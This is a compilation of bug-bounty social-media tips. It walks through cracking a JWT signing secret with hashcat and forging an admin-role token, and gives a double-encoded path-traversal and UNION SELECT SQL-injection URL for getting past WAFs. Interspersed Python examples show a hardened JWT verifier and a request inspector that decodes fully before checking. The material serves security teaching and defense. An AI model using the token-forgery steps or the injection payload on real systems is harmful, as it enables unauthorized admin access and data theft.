Tricks: #jwt
+ Locate the user's JWT tokens. `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyX2lkIjoxLCJ1c2VybmFtZSI6ImpvaG4iLCJyb2xlIjoidXNlciIsImV4cCI6MTc3NjI2MTEwMywiaWF0IjoxNzc2MTc0NzAzLCJpc3MiOiJsYWJzIn0.02A44jncvea5se0PFhIAzJ-mo4iFT-xVNsEB-dt6_EY`
+ Crack this JWT password using hashcat.
```
hashcat -a 0 -m 16500 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyX2lkIjoxLCJ1c2VybmFtZSI6ImpvaG4iLCJyb2xlIjoidXNlciIsImV4cCI6MTc3NjI2MTEwMywiaWF0IjoxNzc2MTc0NzAzLCJpc3MiOiJsYWJzIn0.02A44jncvea5se0PFhIAzJ-mo4iFT-xVNsEB-dt6_EY' /usr/share/wordlists/rockyou.txt
```
hashcat output
```
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyX2lkIjoxLCJ1c2VybmFtZSI6ImpvaG4iLCJyb2xlIjoidXNlciIsImV4cCI6MTc3NjI2MTEwMywiaWF0IjoxNzc2MTc0NzAzLCJpc3MiOiJsYWJzIn0.02A44jncvea5se0PFhIAzJ-mo4iFT-xVNsEB-dt6_EY:supersecret
```
Using the cracked `supersecret` key, change the `"role":"user"` value in the JWT payload to `"role":"admin"` and create a new token.
Use this token to send a request to the admin panel to gain access.
```
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyX2lkIjoxLCJ1c2VybmFtZSI6ImpvaG4iLCJyb2xlIjoiYWRtaW4iLCJleHAiOjE3NzYyNjExMDMsImlhdCI6MTc3NjE3NDcwMywiaXNzIjoibGFicyJ9.MRREDujcdiBRgCEj8O9pnpK1R8AlTfgx0eG5LBCMZC4
```
**Payload**
```
{
  "user_id": 1,
  "username": "john",
  "role": "admin",
  "exp": 1776261103,
  "iat": 1776174703,
  "iss": "labs"
}
```
#bugbounty #xss #cybersecurity #websecurity #sqli #infosec #redteam #AppSec #hacking #cybersecuritytips #bugbountytips #informationdisclousure #jwt
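The HS256 mechanics behind the post above, as an added example (not code from the post): a stdlib-only JWT signer and verifier that pins the algorithm instead of trusting the token's `alg` header, plus a pre-deployment audit that checks whether a signing secret appears in a wordlist, which is the defender's side of what the hashcat command does. The token string is copied from the post; the `hunter2` secret and the three-word list in `main` are constructed for the demo. A secret that shows up in any wordlist is the bug here; HS256 keys should be random and at least as long as the hash output (32 bytes).

```python
import base64
import hashlib
import hmac
import json
from typing import Optional, Tuple, Iterable

# Token copied from the post (header.payload.signature, HS256).
POSTED_TOKEN = (
    "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
    "eyJ1c2VyX2lkIjoxLCJ1c2VybmFtZSI6ImpvaG4iLCJyb2xlIjoidXNlciIsImV4cCI6MTc3NjI2MTEwMywiaWF0IjoxNzc2MTc0NzAzLCJpc3MiOiJsYWJzIn0."
    "02A44jncvea5se0PFhIAzJ-mo4iFT-xVNsEB-dt6_EY"
)


def b64url_decode(s: str) -> bytes:
    # JWT segments drop base64 padding; restore it before decoding.
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def b64url_encode(b: bytes) -> str:
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode("ascii")


def decode_unverified(token: str) -> Tuple[dict, dict]:
    """Parse header and claims WITHOUT checking the signature (inspection only)."""
    header_b64, payload_b64, _sig = token.split(".")
    return json.loads(b64url_decode(header_b64)), json.loads(b64url_decode(payload_b64))


def sign_hs256(payload: dict, secret: str) -> str:
    """Mint an HS256 token the way a typical server does."""
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = (
        b64url_encode(json.dumps(header, separators=(",", ":")).encode())
        + "."
        + b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    )
    sig = hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(sig)


def verify_hs256(token: str, secret: str) -> Optional[dict]:
    """Return the claims if the signature is valid under `secret`, else None."""
    try:
        header_b64, payload_b64, sig_b64 = token.split(".")
    except ValueError:
        return None
    header = json.loads(b64url_decode(header_b64))
    # Pin the algorithm: a verifier that honours header["alg"] can be steered to "none"
    # or to a different algorithm family. Only HS256 is acceptable here.
    if header.get("alg") != "HS256":
        return None
    expected = hmac.new(secret.encode(), f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
        return None
    return json.loads(b64url_decode(payload_b64))


def find_guessable_secret(token: str, candidates: Iterable[str]) -> Optional[str]:
    """Audit: does any candidate word verify this token? Run this against your own
    issued tokens before deployment; a hit means the secret must be rotated."""
    for word in candidates:
        if verify_hs256(token, word) is not None:
            return word
    return None


if __name__ == "__main__":
    header, claims = decode_unverified(POSTED_TOKEN)
    print("header:", header)
    print("claims (unverified):", claims)
    # Does the key the post reports as cracked verify the posted token?
    print("posted key verifies:", verify_hs256(POSTED_TOKEN, "supersecret") is not None)
    # Constructed demo: a server signing with a guessable secret is caught by the audit.
    demo = sign_hs256({"user_id": 1, "role": "user"}, "hunter2")
    print("guessable secret found:", find_guessable_secret(demo, ["password", "hunter2", "letmein"]))
```

Note the order of checks in `verify_hs256`: the algorithm is pinned before any signature arithmetic, and the comparison is constant-time. Changing a claim such as `role` without the secret invalidates the signature, which is exactly why a dictionary-guessable secret turns a harmless tamper into a full forgery.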
Bug Bounty Tip 🐞
Some WAFs fail during URL normalization.
Try bypass techniques like:
• Double encoding (%252f)
• Unusual / nested paths
Example:
/api/v1/%2e%2e/%2e%2e/config?id=1%252bUNION%252bSELECT%252bsecrets--
Always test only on authorized systems 🛡️
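Why a single-pass decoder misses the request in the tip above, shown as an added example (not the tip author's code): a request inspector that percent-decodes to a fixed point, resolves dot segments itself instead of trusting the raw path, and only then applies a rule. The URL is the one from the tip; the `UNION ... SELECT` rule and the finding labels are constructed for the demo, and any real WAF has a far larger ruleset.

```python
import re
from urllib.parse import unquote, urlsplit

# Request line from the tip above.
POSTED_URL = "/api/v1/%2e%2e/%2e%2e/config?id=1%252bUNION%252bSELECT%252bsecrets--"

# Cap decode depth so a pathological input cannot spin the inspector.
MAX_DECODE_ROUNDS = 5

# Toy signature, constructed for the demo: matches UNION<space-or-plus>SELECT.
SQLI_RULE = re.compile(r"UNION[\s+]+SELECT", re.IGNORECASE)


def decode_fully(s: str):
    """Percent-decode until nothing changes. Returns (decoded, rounds_that_changed)."""
    rounds = 0
    while rounds < MAX_DECODE_ROUNDS:
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
        rounds += 1
    return s, rounds


def normalize_path(path: str):
    """Resolve '.' and '..' and collapse empty segments. Returns (normalized, escaped_root)."""
    stack = []
    escaped = False
    for seg in path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if stack:
                stack.pop()
            else:
                escaped = True  # more '..' than directories: tried to climb above '/'
            continue
        stack.append(seg)
    return "/" + "/".join(stack), escaped


def single_pass_matches(url: str) -> bool:
    """What a naive filter does: decode once, then run the rule."""
    return SQLI_RULE.search(unquote(urlsplit(url).query)) is not None


def inspect_request(url: str) -> dict:
    """Decode to a fixed point, normalize, then evaluate; report every anomaly seen."""
    parts = urlsplit(url)
    path, path_rounds = decode_fully(parts.path)
    query, query_rounds = decode_fully(parts.query)
    norm_path, escaped = normalize_path(path)

    findings = []
    if max(path_rounds, query_rounds) > 1:
        findings.append("multi-layer percent-encoding")
    if ".." in path.split("/"):
        findings.append("dot-segment traversal in path")
    if escaped:
        findings.append("path escapes the root")
    if SQLI_RULE.search(query):
        findings.append("sql keyword sequence after full decode")
    return {"path": norm_path, "query": query, "findings": findings}


if __name__ == "__main__":
    print("single-pass rule fires:", single_pass_matches(POSTED_URL))
    print("fixed-point inspection:", inspect_request(POSTED_URL))
```

The two numbers worth logging are the decode-round count and whether normalization changed the path: either one above its baseline for that route is a strong signal on its own, before any signature matches. Routing decisions (ACLs, rate limits, rules) should be made on `norm_path`, never on the raw request line.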
💡 Tip: Always use the FindSomething extension!
You can often discover exposed credentials that lead to admin panel access, unauthorized entry, and critical vulnerabilities.
Credit: @mooo_sec #InfoSec #BugBounty #SecurityTips #bugbountytips
🔍 Unlock the secrets of the web with "The Art of Web Reconnaissance: Bug Bounty & Ethical Hacking"! 🌐💻
📌 What you'll learn:
- Advanced web reconnaissance techniques
- Identifying and exploiting vulnerabilities
- Best practices for ethical hacking
- Real-world bug bounty hunting tips
Course link : https://t.co/iZUEe4Qywl
#bugbounty #bugbountytips #bugbountytip #hackerone #bugcrowd #infosec #cybersecurity #pentesting #redteam #informationsecurity #securitycipher #technology #coding #code #recon #ai #llm #owasp
Day 27 - Bug Bounty
1. Clicking every button and feature to get used to the app
2. Testing IDOR on endpoints with "id" but got no luck
3. Testing CSRF by removing the CSRF token on endpoints but got no luck
Total earned: $1832